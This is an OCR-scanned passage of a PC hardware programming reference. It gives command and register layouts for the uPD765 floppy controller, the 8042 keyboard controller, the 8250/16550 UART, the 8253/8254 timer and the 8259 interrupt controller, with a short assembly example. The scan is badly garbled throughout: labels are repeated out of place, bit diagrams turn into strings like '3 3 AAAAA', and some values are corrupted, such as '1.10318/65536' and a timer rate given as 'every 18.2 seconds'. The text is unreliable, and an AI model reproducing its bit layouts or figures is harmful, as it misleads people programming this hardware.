command 
result 
result 
result 
result 
result 
result 
result 


% write D 


command 
command 
command 
command 
command 
command 
command 
command 
command 


byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 


leted 


byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 


ata 


byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 
byte 


DUISNWN-FOo 


DUISWN-Froeo 


Data 


DO NOUOUSNWN-FOoeo 


result byte 0: 
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*ONDOUIISWNFO 


*ONDOUISDWNFFO 


D7 


D7 


D6 D5 D4 D3 D2 D1 DO 


MT MF SK0 01 10 
2? 29? ? HD US1 USO 
cylinder number 
head number 
sector number 
bytes per sector 
end of track (last sector in track) 
gap 3 length 
data length (if cmd byte 5==0) 
status register 0 
status register 1 
status register 2 
cylinder number 
head number 
sector number 
bytes per sector 


D7 D6 D5 D4 D3 D2 D1 DO 


MT MF SK0 11 00 
2? 29? ? HD US1 USO 
cylinder number 
head number 
sector number 
bytes per sector 
end of track (last sector in track) 
gap 3 length 
data length (if cmd byte 5==0) 
status register 0 
status register 1 
status register 2 
cylinder number 
head number 
sector number 
bytes per sector 


D6 D5 D4 D3 D2 D1 DO 


MT MF 00 01 01 

2? 29, ? HD USI USO 

cylinder number 

head number 

sector number 

bytes per sector 

end of track (last sector in track) 

gap 3 length 

data length (if cmd byte 5==0) 
status register 0 


result 
result 
result 
result 
result 
result 


% 


command 
command 
command 
command 
command 
command 
command 
command 
command 
result 
result 
result 
result 
result 
result 
result 


% 
% 


Read a 
(Diagno 
command 
command 
command 
command 
command 
command 
command 
command 
command 
result 
result 
result 
result 
result 
result 
result 


% Read ID 


command byte 0: 
command byte 1: 


result 
result 
result 
result 
result 
result 
result 


% 
% 


Format 
(Write 
command 
command 
command 
command 
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byte 1: status register 1 
byte 2: status register 2 
byte 3: cylinder number 
byte 4: head number 
byte 5: sector number 
byte 6: bytes per sector 
Write Deleted Data D7 D6 D5 D4 D3 D2 D1 DO 
byte 0: MT MF 00 10 01 
byte 1: 2? 29? ? HD US1 USO 
byte 2: cylinder number 
byte 3: head number 
byte 4: sector number 
byte 5: bytes per sector 
byte 6: end of track (last sector in track) 
byte 7: gap 3 length 
byte 8: data length (if cmd byte 5==0) 
byte 0: status register 0 
byte 1: status register 1 
byte 2: status register 2 
byte 3: cylinder number 
byte 4: head number 
byte 5: sector number 
byte 6: bytes per sector 
Track D7 D6 D5 D4 D3 D2 D1 DO 
stic) 
byte 0: 0 MF SK0 00 10 
byte 1: 2? 29? ? HD US1 USO 
byte 2: cylinder number 
byte 3: head number 
byte 4: sector number 
byte 5: bytes per sector 
byte 6: end of track (last sector in track) 
byte 7: gap 3 length 
byte 8: data length (if cmd byte 5==0) 
byte 0: status register 0 
byte 1: status register 1 
byte 2: status register 2 
byte 3: cylinder number 
byte 4: head number 
byte 5: sector number 
byte 6: bytes per sector 
D7 D6 D5 D4 D3 D2 D1 DO 
O MF 00 10 10 
2? 29? ? HD US1 USO 
byte 0: status register 0 
byte 1: status register 1 
byte 2: status register 2 
byte 3: cylinder number 
byte 4: head number 
byte 5: sector number 
byte 6: bytes per sector 
a Track D7 D6 D5 D4 D3 D2 D1 DO 
Sector IDS) 
byte 0: O MF 00 11 01 
byte 1: 2? 29? ? HD US1 USO 
byte 2 bytes per sector 
byte 3 sectors per track 


command byte 4: gap 3 length 
command byte 5: filler pattern to write in each byte 


result byte 0: status register 0 
result byte 1: status register 1 
result byte 2: status register 2 
result byte 3: cylinder number 
result byte 4: head number 
result byte 5: sector number 
result byte 6: bytes per sector 
% Scan Equal D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: MT MF SK1 O 0 01 
command byte 1: 2? 29? ?. HD US1 USO 
command byte 2: cylinder number 
command byte 3: head number 
command byte 4: sector number 
command byte 5: bytes per sector 
command byte 6: end of track (last sector in track) 
command byte 7: gap 3 length 
command byte 8: scan test (1=scan contiguous, 2=scan alternate) 
result byte 0: status register 0 
result byte 1: status register 1 
result byte 2: status register 2 
result byte 3: cylinder number 
result byte 4: head number 
result byte 5: sector number 
result byte 6: bytes per sector 
% Scan Low or Equal D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: MT MF SK1 10 01 
command byte 1: 2? 29? ?. HD US1 USO 
command byte 2: cylinder number 
command byte 3: head number 
command byte 4: sector number 
command byte 5: bytes per sector 
command byte 6: end of track (last sector in track) 
command byte 7: gap 3 length 
command byte 8: scan test (1=scan contiguous, 2=scan alternate) 
result byte 0: status register 0 
result byte 1: status register 1 
result byte 2: status register 2 
result byte 3: cylinder number 
result byte 4: head number 
result byte 5: sector number 
result byte 6: bytes per sector 
% Scan High or Equal D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: MT MF SK1 11 01 
command byte 1: Q? 29? ?. HD US1 USO 
command byte 2: cylinder number 
command byte 3: head number 
command byte 4: sector number 
command byte 5: bytes per sector 
command byte 6: end of track (last sector in track) 
command byte 7: gap 3 length 
command byte 8: scan test (1=scan contiguous, 2=scan alternate) 
result byte 0: status register 0 
result byte 1: status register 1 
result byte 2: status register 2 
result byte 3: cylinder number 
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result byte 4: head number 


result byte 5: sector number 
result byte 6: bytes per sector 

% Recalibrate D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: (0) 


DO 
DO 
NO 
O) 
OH 
pH 
pH 


command byte 1: ? 
returns nothing 


% Sense Interrupt D7 D6 D5 D4 D3 D2 D1 DO 
% Status 
command byte 0: O 0 O 0 10 0 0 
result byte 0: status register 0 
result byte 1: present cylinder number 
% Specify Step & D7 D6 D5 D4 D3 D2 D1 DO 
% Head Load 
command byte 0: O 0 0 0 0 0 11 
command byte 1: step rate time 3 head unload time 
command byte 2: AAAAAAhead load timeAAAAAA ND 
returns nothing 
% Sense Drive D7 D6 D5 D4 D3 D2 D1 DO 
% Status 
command byte 0: O 0 0 0 01 0 0 
command byte 1: Q? 29? ?. HD US1 USO 
result byte 0: status register 3 
% Seek D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: O 0 0 0 11 11 
command byte 1: 2? 29? ?. HD US1 USO 
command byte 2: new cylinder number 


returns nothing 


% ePD765 Version D7 D6 D5 D4 D3 D2 D1 DO 
command byte 0: Q? 21 0 0 0 0 
result byte 0: status register 0 


90h = ®PD765B; 80h = &PD765A or ®PD765A-2 


% Invalid Command 
result byte 0: status register ®© (value of 80h) 
% Key to Abbreviations 
HD = Head Number Selected SK = SKip Deleted-data address mark 
MT = Multi-Track USO = drive select bit 0 
MF = MFM mode US1 = drive select bit 1 
ND = Non-DMA mode 


Head Load Time = 2 to 254ms in 2ms increments 
Head Unload Time = 16 to 240ms in 16ms increments 
Step Rate Time = 1 to 16ms in 1ms increments 


- PS/2 systems use the 8272A diskette controller which is software 
and port compatible with the NEC &PD765 

- accessed through ports 3F0h-3F7h; NEC aPD765 is accessed through 
ports 3F2h, 3F4h and 3F5h; the 8272A uses ports 3FOh, 8Fih, 
3F2h, 3F4h, 3F5h and 3F7h 
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- data, command and status registers are all accessed through 
port 3F5h a register stack with one address presented to the bus 
- bit 7 of BIOS Data Area byte 40:3E can be polled to determine 
if a disk operation has completed; this bit is set by the 
interrupt handler when the operation has completed; it should 
be reset before continuing on with the next FDC operation 


- see -—BIOS Data Area- -INT TABLE- -INT 13- 


:8042:keyboard controller 
A8042 - Keyboard Controller (AT,PS/2) 


% 8042 Status Register (port 64h read) 


37363 


534333231303 8042 Status Register 

3 3 s 3 3 AAAAA output register (60h) has data for system 

3 3 s 3 AAAAAA input register (60h/64h) has data for 8042 

3 s 3 AAAAAAA system flag (set to 0 after power on reset) 

3 3 AAAAAAAA data in input register is command (1) or data (0) 

3 AAAAAAAAA 1=keyboard enabled, 0=keyboard disabled (via switch) 
AAAAAAAAAA 1=transmit timeout (data transmit not complete) 
AAAAAAAAAKA 1=receive timeout (data transmit not complete) 
AAAAAAAAAAAA 1=even parity rec'd, O=odd parity rec'd (should be odd) 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


% Port Mode Description 


64h read 8042 status register. Can be read at any time. See 
table above for more information. 

64h write 8042 command register. Writing this port sets Bit 3 
of the status register to 1 and the byte is treated 
as a controller command. Devices attached to the 
8042 should be disabled before issuing commands that 
return data since data in the output register will 
be overwritten. 

60h read 8042 output register (should only be read if Bit 0 of 
status port is set to 1) 

60h write 8042 data register. Data should only be written if 
Bit 1 of the status register is zero (register is empty). 
when this port is written Bit 3 of the status register 
is set to zero and the byte is treated as a data. The 
8042 uses this byte if it's expecting data for a previous 
command, otherwise the data is written directly to the 
keyboard. See -KEYBOARD COMMANDS- for information on 
programming the actual keyboard hardware. 


A8042 Commands Related to PC Systems (Port 64h) 
% Command Description 


20 Read 8042 Command Byte: current 8042 command byte is placed 


in port 60h. 

60 Write 8042 Command Byte: next data byte written to port 60h is 
placed in 8042 command register. Format: 
37363534333231303 8042 Command Byte 
3 3 3 s 3 s 3 AAAAA 1=enable output register full interrupt 
3 3 3 3 3 3 AAAAAA should be 0 
3 s 3 s 3 AAAAAAA 1=set status register system, 0=clear 
3 3 3 3 AAAAAAAA 1=override keyboard inhibit, O=allow inhibit 
3 3 3 AAAAAAAAA disable keyboard 1/0 by driving clock line low 
3 3 AAAAAAAAAA disable auxiliary device, drives clock line low 
3 


AAAAAAAAAAA IBM scancode translation O=AT, 1=PC/XT 
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A4 


AS 


A6 
AT 


A8 
A9 


AE 


CO 


C1 


C2 


DO 


DI 


D2 
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\AARARAAARAK reserved, should be © 


Password Installed Test: returned data can be read 

from port 60h; FA=password installed, Fi=no password 

Load Security: bytes written to port 60h will be read 

until a null (0) is found. 

Enable Security: works only if a password is already loaded 
Disable Auxiliary Interface: sets Bit 5 of command register 
stopping auxiliary 1/0 by driving the clock line low 

Enable Auxiliary Interface: clears Bit 5 of command register 
Auxiliary Interface Test: clock and data lines are tested; 
results placed at port 60h are listed below: 


00 no error 

01 keyboard clock line is stuck low 
02 keyboard clock line is stuck high 
03 keyboard data line is stuck low 
04 keyboard data line is stuck high 


Self Test: diagnostic result placed at port 60h, 55h=0K 
Keyboard Interface Test: clock and data lines are tested; 
results placed at port 60h are listed above with command A9 
Diagnostic Dump: sends 16 bytes of 8042's RAM, current input 
port state, current output port state and 8042 program status 
word to port 60h in scan-code format. 

Disable Keyboard Interface: sets Bit 4 of command register 
stopping keyboard 1/0 by driving the clock line low 

Enable Keyboard Interface: clears Bit 4 of command register 
enabling keyboard interface. 

Read Input Port: data is read from its input port (which is 
inaccessible to the data bus) and written to output register 
at port 60h; output register should be empty before call. 


3736353433-03 8042 Input Port 

3 3 3 AAAAA undefined 

8 3 AAAAAA 1=enable 2nd 256K of motherboard RAM, 0=disable 
3 AAAAAAA 1=manufacturing jumper not installed, O=installed 
AAAAAAKA 1=primary display is MDA, O=primary display is CGA 
AAAAAAAAA 1=keyboard not inhibited, 0=keyboard inhibited 


dg RE a 


Poll Input Port Low Bits: Bits 0-3 of port 1 placed in 

status Bits 4-7 

Poll Input Port High Bits: Bits 4-7 of port 1 placed in 

status Bits 4-7 

Read Output Port: data is read from 8042 output port (which is 
inaccessible to the data bus) and placed in output register; 
the output register should be empty. (see command D1 below) 
Write Output Port: next byte written to port 60h is placed in 
the 8042 output port (which is inaccessible to the data bus) 


373 


7363534333231303 8042 Output Port 

3 s 3 3 3 3 3 AAAAA system reset line 

3 3 3 3 3 3 AAAAAA gate A20 

3 3 3 3 AAAAAAAAA undefined 

3 s 3 AAAAAAAAAA output buffer full 

3 3 AAAAAAAAAAA input buffer empty 

3 AAAAAAAAAAAA keyboard clock (output) 

AAAAAAAAAAAAA keyboard data (output) 

Write Keyboard Output Register: on PS/2 systems the next data 
byte written to port 60h input register is written to port 60h 
output register as if initiated by a device; invokes interrupt 
if enabled 


D3 Write Auxiliary Output Register: on PS/2 systems the next data 
byte written to port 60h input register is written to port 60h 
output register as if initiated by a device; invokes interrupt 
if enabled 

D4 Write Auxiliary Device: on PS/2 systems the next data byte 
written to input register a port at 60h is sent to the 
auxiliary device 

EO Read Test Inputs: 8042 reads its TO and T1 inputs; data is 
placed in output register; Bit 0 is TO, Bit 1 is T1: 


31303 Test Input Port Bits 
3 AAAAA keyboard clock 
AAAAAA keyboard data 


Fx Pulse Output Port: Bits 0-3 of the 8042 output port can be 
pulsed low for 6 es; Bits 0-3 of command indicate which 
Bits should be pulsed; O=pulse, i1=don't pulse; pulsing 
Bit © results in CPU reset since it is connected to system 
reset line. 


- PC systems previous to the AT use the 8255 PPI as a keyboard 
controller and use the keyboard's internal 8048. 

- the keyboard's internal controller buffers up to 16 bytes of 
make/break code information. This is common among all PC systems 
and shouldn't be confused with the (32 byte) keyboard buffer 
maintained by the BIOS. 

- see -—KEYBOARD COMMANDS- for information on programming the 
keyboards internal microprocessor 

:8250: 16450: 16550: UART 
AUART - Universal Asynchronous Receiver/Transmitter 


% Port Description 


3F8/2F8 Transmit/Receive Buffer (read/write) 
Baud Rate Divisor LSB if bit 7 of LCR is set (read/write) 
3F9/2F9 IER - Interrupt Enable Register (read/write) 
Baud Rate Divisor MSB if bit 7 of LCR is set (read/write) 
3FA/2FA IIR - Interrupt Identification Register (read only) 
FCR - 16550 FIFO Control Register (write only) 
3FB/2FB LCR - Line Control Register (read’/write) 
3FC/2FC MCR - Modem Control Register (read/write) 
3FD/2FD LSR - Line Status Register (read only) 
3FE/2FE MSR - Modem Status Register (read only) 
3FF/2FF Scratch Pad Register (read/write) 


ADetailed UART Description 


% Port 3F8 - Transmit/Receive Buffer (read/write) 
% Baud Rate Divisor LSB if bit 7 of LCR is set (read’/write) 
% Port 3F9 - Interrupt Enable Register - IER (read’/write) 
% Baud Rate Divisor MSB if bit 7 of LCR is set (read/write) 
37363534333231303 2F9, 3F9: Interrupt Enable Register 
3 3 3 3 3 s 3 AAAAA 1 = enable data available int (and 16550 Timeout) 
3 s 3 s 3 s AAAAAA 1 = enable THRE interrupt 
3 s 3 s 3 AAAAAAA 1 = enable lines status interrupt 
3 3 3 


3 AAAAAAKA 1 = enable modem-status-change interrupt 
\AAAARARARKAAAA reserved (zero) 


- 16550 will interrupt if data exists in the FIFO and isn't read 
within the time it takes to receive four bytes or if no data is 
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received within the time it takes to receive four bytes. 


ABaud Rate Divisor Table 


% Baud Rate Baud Rate 
% Baud Rate Divisor Baud Rate Divisor 
50 900h 2400 30h 
110 417h 3600 20h 
150 300h 4800 18h 
300 180h 7200 10h 
600 coh 9600 och 
1200 60h 19200 06h 
1800 40h 38400 03h 
2000 3Ah 115200 01h 


- Baud rate divisors can be calculated by taking the oscillating 
frequency (1,843, 200) and dividing by the quantity of the desired 
baud rate times the UART clocking factor (16). Use the following 
formula: 

Adivisor = 1843200 / (BaudRate * 16); 


APort 3FA - Interrupt Identification Register - IIR (read only) 
37363534333231303 2FA, 3FA Interrupt ID Register 

3 3 3 3 3 s 3 AAAAA 1 = no int. pending, O=int. pending 

3 3 3 3 3 AAAAAAAA Interrupt Id bits (see below) 

3 3 3 3 AAAAAAAAA 16550 1 = timeout int. pending, 0 for 8250/16450 

3 3 AAAAAAAAAAAA reserved (zero) 

AAAAAAAAAAAAAAKA 16550 set to 1 if FIFO queues are enabled 


% Bits 

% 21 Meaning Priority To reset 
00 modem-status-change lowest read MSR 
01 transmit-register-empty low read IIR / write THR 
10 data-available high read rec buffer reg 
11 line-status highest read LSR 


- interrupt pending flag uses reverse logic, 0 = pending, 1 = none 
- interrupt will occur if any of the line status bits are set 
- THRE bit is set when THRE register is emptied into the TSR 


APort 3FA - 16550 FIFO Control Register - FCR (write only) 


37363 


534333231303 2FA, 3FA FIFO Control Register 

3 3 s 3 3 AAAAA 1 = enable clear XMIT and RCVR FIFO queues 

3 3 3 3 AAAAAA 1 = clear RCVR FIFO 

3 s 3 AAAAAAA 1 = clear XMIT FIFO 

3 3 AAAAAAAA 1 = change RXRDY & TXRDY pins from mode © to mode 1 
AAAAAAAAAKA reserved (zero) 

AAAAAAAAAAAAAA trigger level for RCVR FIFO interrupt 


736 
3 3 
3 3 
3 3 
3 3 
3 3 


% Bits RCVR FIFO 
% 76 Trigger Level 
00 1 byte 
01 4 bytes 
10 8 bytes 
11 14 bytes 


- Bit 0 must be set in order to write to other FCR bits 
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- Bit 1 when set to 1 the RCVR FIFO is cleared and this bit is reset. 
The receiver shift register is not cleared. 

- Bit 2 when set to 1 the XMIT FIFO is cleared and this bit is reset. 
The transmit shift register is not cleared. 


APort 3FB - Line Control Register - LCR (read/write) 


3 3 AAAAAAAAA 0 = no parity, 1 = parity (PEN) 
l \ARAAAAARA 0 = ‘sdd-parity; 1= even (EPS) 
AAAAAAAAAAKA © = parity disabled, 1 = enabled 
AAAAAAAAAAAA © = turn break off, 1 = force spacing break state 
AAAAAAAAAAAAA 1 = baud rate divisor (DLAB); © = RBR, THR or IER 


736 

3 3 

3 s 3 s 3 AAAAAAAA 0 = 1 stop bit, 1 = 1.5 or 2 (see note) 
3 3 

3 3 

3 3 

3 


% Bits 

% 10 Word length bits 
00 = 5 bits per character 
01 = 6 bits per character 
10 = 7 bits per character 
11 = 8 bits per character 


- stop bits = 1.5 for 5 bit words or 2 for 6, 7 or 8 bit words 

- bit 7 changes the mode of registers 3F8 and 3F9. If set these 
registers become the LSB and MSB of the baud rate divisor. 
Otherwise 3F8 is the Transmit/Receive Buffer Register and 3F9 is 
the Interrupt Enable Register. 


APort 3FC - Modem Control Register - MCR (read/write) 


37363 


534333231303 2FC, 8FC. Modem Control Register 
3 3 s 3 3 AAAAA 1 = activate DTR 
3 3 3 3 AAAAAA 1 = activate RTS 
336 ARA OUT 
"a \AAAAAAA OUT2 

3 AAAAAAAAA © = normal, 1 = loop back test 
COTTO AI 


736 
3 3 
3 3 
3 3 
3 3 
3 3 


- If bit 4 is set, data from the Transmit Shift Register is received 
in the Receiver Shift Register. The SOUT line is set to logic 
high, the SIN line and control lines are disconnected. CTS, DSR, 
RI and CD inputs are disconnected. DTR, RTS, OUT1 and OUT2 are 
then connected internally. 


APort 3FD - Line Status Register - LSR (read only) 
3 534333231303 2FD, 3FD Line Status Register 

3 3 s 3 3 AAAAA 1 = data ready 

3 s 3 3 AAAAAA 1 = overrun error (0E) 

3 s 3 AAAAAAA 1 = parity error (PE) 

3 s AAAAAAAA 1 = framing error (FE) 

3 AAAAAAAAA 1 = break interrupt (BI) 

AAAAAAAAAA 1 = transmitter holding register empty (THRE) 

AAAAAAAAAAA 1 = transmitter shift register empty (TSRE) 

AAAAAAAAAAAA 1 = 16550 PE/FE/Break in FIFO queue, 0 for 8250 & 16450 


- Bit 0 is set when a byte is placed in the Receiver Buffer Register 
and cleared when the byte is read by the CPU (or when the CPU 
clears the FIFO for the 16550). Results in Receive Data Available 


Pagina 607 di 991 


Interrupts if enabled. 

- Bits 1-4 indicate errors and result in Line Status Interrupts 
if enabled. 

- Bit 1 is set when a second byte is received before the byte 
in the Receiver Buffer Register is read by the CPU (the 16550 in 
FIFO mode sets this bit when the queue is full and the byte in the 
Receiver Shift Register hasn't been moved into the queue). This 
bit is reset when the CPU reads the LSR 

- Bit 2 is set whenever a byte is received that doesn't match the 
requested parity. Reset upon reading the LSR. (The 16550 maintains 
parity information with each byte and sets bit 2 only when the byte 
is at the top of the FIFO queue.) 

- Bit 3 is set when a character is received without proper stop 
bits. Upon detecting a framing error the UART attempts to 
resynchronize. Reset by reading the LSR. (The 16550 maintains 
this information with each byte and sets bit 3 only when the byte 
is at the top of the FIFO queue.) 

- Bit 4 is set when a break condition is sensed (when space is 
detected for longer than 1 fullword). A zero byte is placed in 
the Receiver Buffer Register (or 16550 FIFO). Reset by reading 
the LSR. (The 16550 maintains this information with each byte and 
sets bit 4 only when the byte is at the top of the FIFO queue.) 

- Bit 5 is set when the Transmit Holding Register shifts a byte 
into the Transmit Shift Register (or XMIT FIFO queue is empty for 
16550) and is cleared when a byte is written to the THR (or the 
XMIT FIFO). Results in Transmit Holding Register Empty interrupts 
if enabled. 

- Bit 6 is set when both the Transmitter Holding Register and the 
Transmitter Shift Register are empty. On the 16550, when the XMIT 
FIFO and Transmitter Shift Register are empty. 

- Bit 7 is 16550 specific and indicates there is a byte in the FIFO 
queue that was received with a Parity, Framing or Break error. 


APort 3FE - Modem Status Register - MSR (read only) 


373 


534333231303 2FE, 8FE Modem Status Register 

3 3 3 3 3 AAAAA 1 = DCTS Delta CTS (CTS changed) 

3 3 3 3 AAAAAA 1 = DDSR Delta DSR (DSR changed) 

3 3 3 AAAAAAA 1 = RI ring indicator changed 

3 3 AAAAAAAA 1 = DDCD Delta Data Carrier Detect (DCD changed) 
3 ARAAAAARA 1 = CTS 

\AAAAAARAA 1 = Bep 

\AAAAAARAAA 1 = ring ddecator (P0) 

AAAAAAAAAAKA 1 = receive line signal detect 


7 
3 
3 
3 
3 
3 
3 
3 


- Bits 0-3 are reset when the CPU reads the MSR 

- Bit 4 is the Modem Control Register RTS during loopback test 
- Bit 5 is the Modem Control Register DTR during loopback test 
- Bit 6 is the Modem Control Register OUT1 during loopback test 
- Bit 7 is the Modem Control Register 0UT2 during loopback test 


NAPort 3FF/2FF - Scratch Pad Register (read/write) 


% Programming considerations: 

- 8250's, 16450's are essentially identical to program 

- 16550's is pin and software compatible with the 16450 but has an 
internal FIFO queue that may be enabled/disabled by software 

- PCs are capable of 38.4Kb, while AT's are capable of 115.2Kb 

- receiver checks only the first stop bit of each character regardless 
of the number of stop bits specified 

- Older 8250 and 16450 UARTS may lose THRE interrupt if the THRE and 
Receive Data (RD) or the Line Status (LS) interrupts occur 
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simultaneously during a full duplex transmission. RD and LS have 
higher priority than THRE which causes the lower priority interrupt 
to be lost. The following are 3 methods used to avoid this problem: 


1. Disable/re-enable THRE interrupt via the IER after processing 
Receive Data & Line Status interrupts. 

2. While inside the RD and LS interrupt routines check the LSR 
THRE bit and set a flag that a THRE interrupt was waiting. 

3. Poll the LSR THRE bit instead of using the IRR. 


- data loss can occur without overrun or framing errors if the 
interrupts are serviced too slowly 

- reserved bits are usually set to zero. Code should NOT rely on 
this being the case since future enhancement may use these bits 

- see -—INT TABLE- or -IRQ- for interrupt assignments 

- see -PORTS- for COMx port assignment (3F8,2F8,3E8,2E8,3220...) 


:8253:8254:PIT:timer 
A8253/8254 PIT - Programmable Interval Timer 


% 
% 


% 
% 


% 
% 


Port 40h, 8253 Counter 0 Time of Day Clock (normally mode 3) 
Port 41h, 8253 Counter 1 RAM Refresh Counter (normally mode 2) 
Port 42h, 8253 Counter 2 Cassette and Speaker Functions 

Port 43h, 8253 Mode Control Register, data format: 


37363534333231303 Mode Control Register 

3 3 3 3 3 s 3 AAAAA 0=16 binary counter, 1=4 decade BCD counter 

3 3 3 3 AAAAAAAAAA counter mode bits 

3 3 AAAAAAAAAKAAAA read/write/latch format bits 

AAAAAAAAAAAAAAAA counter select bits (also 8254 read back command) 


Bits 

76 Counter Select Bits 

00 select counter 0 

01 select counter 1 

10 select counter 2 

11 read back command (8254 only, illegal on 8253, see below) 


54 Read/Write/Latch Format Bits 

00 latch present counter value 

01 read/write of MSB only 

10 read/write of LSB only 

11 read/write LSB, followed by write of MSB 


321 Counter Mode Bits 

000 mode ©, interrupt on terminal count; countdown, interrupt, 
then wait for a new mode or count; loading a new count in the 
middle of a count stops the countdown 

001 mode 1, programmable one-shot; countdown with optional 
restart; reloading the counter will not affect the countdown 
until after the following trigger 

010 mode 2, rate generator; generate one pulse after 'count' CLK 
cycles; output remains high until after the new countdown has 
begun; reloading the count mid-period does not take affect 
until after the period 

011 mode 3, square wave rate generator; generate one pulse after 
'count' CLK cycles; output remains high until 1/2 of the next 
countdown; it does this by decrementing by 2 until zero, at 
which time it lowers the output signal, reloads the counter 
and counts down again until interrupting at 0; reloading the 
count mid-period does not take affect until after the period 

100 mode 4, software triggered strobe; countdown with output high 
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until counter zero; at zero output goes low for one CLK 
period; countdown is triggered by loading counter; reloading 
counter takes effect on next CLK pulse 

101 mode 5, hardware triggered strobe; countdown after triggering 
with output high until counter zero; at zero output goes low 
for one CLK period 


% Read Back Command Format (8254 only) 


37363534333231303 Read Back Command (written to Mode Control Reg) 
3 3 3 3 3 AAAA must be zero 

3 3 3 3 AAAAA select counter 0 

3 3 3 AAAAAA select counter 1 

3 3 AAAAAAA select counter 2 

3 AAAAAAAA © = latch status of selected counters 

AAAAAAARA latch count of selected counters 


7 
3 
3 
3 
3 
3 
3 0 
AAAAAAAAAAAA 11 read back command 


6 
3 
3 
3 
3 
3 
3 


% Read Back Command Status (8254 only, read from counter register 
y g 


37363534333231303 Read Back Command Status 

3 3 3 3 3 s 3 AAAA 0=16 binary counter, 1=4 decade BCD counter 

3 3 3 3 AAAAAAAAA counter mode bits (see Mode Control Reg above) 
3 3 AAAAAAAAKAAA read/write/latch format (see Mode Control Reg) 
3 AAAAAAAAAAAAA 1=null count (no count set), O=count available 
AAAAAAAAAAAAAA state of OUT pin (1=high, ©O=l0w) 


- the 8253 is used on the PC & XT, while the 8254 is used on the AT+ 

- all counters are decrementing and fully independent 

- the PIT is tied to 3 clock lines all generating 1.19318 MHz. 

- the value of 1.19318MHz is derived from (4.77/4 MHz) and has it's 
roots based on NTSC frequencies 

- counters are 16 bit quantities which are decremented and then 
tested against zero. Valid range is (0-65535). To get a value 
of 65536 clocks you must specify 0 as the default count since 
65536 is a 17 bit value. 

- reading by latching the count doesn't disturb the countdown but 
reading the port directly does; except when using the 8254 Read 
Back Command 

- counter 0 is the time of day interrupt and is generated 
approximately 18.2 times per sec. The value 18.2 is derived from 
the frequency 1.10318/65536 (the normal default count). 

- counter 1 is normally set to 18 (dec.) and signals the 8237 to do 
a RAM refresh approximately every 15&s 

- counter 2 is normally used to generate tones from the speaker 
but can be used as a regular counter when used in conjunction 
with the 8255 

- newly loaded counters don't take effect until after a an output 
pulse or input CLK cycle depending on the mode 

- the 8253 has a max input clock rate of 2.6MHz, the 8254 has max 
input clock rate of 10MHz 


% Programming considerations: 
1. load Mode Control Register 
2. let bus settle (jmp $+2) 
3. write counter value 
4. if counter © is modified, an INT 8 handler must be written to 


call the original INT 8 handler every 18.2 seconds. When it 
does call the original INT 8 handler it must NOT send and EOI 
to the -8259- for the timer interrupt, since the original INT 8 
handler will send the EOI also. 
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% 


count 


18259: 


N8259 


% 


% 


% 


% 


Example code: 


countdown equ 8000h ; approx 36 interrupts per second 
cli 
MOV al,00110110b ; bit 7,6 = (00) timer counter 0 


; bit 5,4 = (11) write LSB then MSB 
; bit 3-1 = (011) generate square wave 
; bit 0 = (0) binary counter 


out 43h, al j prep PIT, counter 0, square wave&init 
jmp $+2 
MOV cx, countdown ; default is 0x0000 (65536) (18.2 per sec) 
; interrupts when counter decrements to 0 
mov al,cl ; send LSB of timer count 
out 40h, al 
jmp $+2 
mov al,ch ; send MSB of timer count 
out 40h, al 
jmp $+2 
sti 
PIC 


Programmable Interrupt Controller (PIC) 


Initialization Command Word 1 at Port 20h and A0h 


37363 


534333231303 ICWI 

3 3 3 3 3 AAAAA 1=ICW4 is needed, 0O=no ICW4 needed 

3 3 3 3 AAAAAA 1=single 8259, O=cascading 8259's 

3 s 3 AAAAAAA 1=4 byte interrupt vectors, 0=8 byte int vectors 
3 3 AAAAAAAA 1=level triggered mode, 0=edge triggered mode 

3 AAAAAAAAA must be 1 for ICW1 (port must also be 20h or A0h) 
AAAAAAAAAAAAAA must be zero for PC systems 


736 
3 3 
3 3 
3 3 
3 3 
3 3 


Initialization Command Word 2 at Port 21h and A1h 


37363534333231303 ICW2 
3 s 3 s 3 AAAAAAAAA 000= on 80x86 systems 
AAAAAAAAAKRAAAAAAAA A7-A3 of 80x86 interrupt vector 


Initialization Command Word 3 at Port 21h and Aih 


37363 


534333231303 ICW3 for Master Device 

3 s 3 s 3 AAAAA 1=interrupt request 0 has slave, 0O=no slave 
3 s 3 s AAAAAA 1=interrupt request 1 has slave, O=no slave 
3 s 3 AAAAAAA 1=interrupt request 2 has slave, 0O=no slave 

3 s AAAAAAAA 1=interrupt request 3 has slave, O=no slave 

3 AAAAAAAAA 1=interrupt request 4 has slave, 0O=no slave 
AAAAAAAAAA 1=interrupt request 5 has slave, 0O=no slave 
AAAAAAAAAAA 1=interrupt request 6 has slave, O=no slave 
AAAAAAAAAAAA 1=interrupt request 7 has slave, O=no slave 


736 
33 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


37363534333231303 ICW3 for Slave Device 
3 3 s 3 3 AAAAAAAAA master interrupt request slave is attached to 
AAAAAAAAAARAAAAAAAA must be zero 


Initialization Command Word 4 at Port 21h and Aih 


37363534333231303 ICW4 

3 3 3 s 3 s 3 AAAAA 1 for 80x86 mode, 0 = MCS 80/85 mode 
3 s 3 s 3 3 AAAAAA 1 = auto EOI, 0=normal EOI 

3 3 3 3 AAAAAAAAA slave/master buffered mode (see below) 
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% 


% 


% 


% 


% 


% 


% 


3 


3 


3 AAAAAAAAAA 1 = special fully nested mode (SFNM), O=sequential 
AAAAAAAAAAAAAAA unused (set to zero) 


Buffering Mode 

not buffered 

not buffered 

buffered mode slave (PC mode) 
buffered mode master (PC mode) 


Operation Control Word 1 / Interrupt Mask Reg. (Ports 21h & A1h) 


3 


34333231303 O0CW1 - IMR Interrupt Mask Register 


3 


3 
3 


3 3 AAAAA 0 = service IRQ0, 1 = mask off 
3 AAAAAA 0 = service IRQ1, 1 = mask off 


3 AAAAAAA © = service IRQ2, 1 = mask off 
3 AAAAAAAA © = service IRQ3, 1 = mask off 
AAAAAAAAA 0 = service IRQ4, 1 = mask off 
AAAAAAAAAA 0 = service IRQ5, 1 = mask off 
IAIUMAARIA BL ‘Service ‘IR06, L= mask-off 
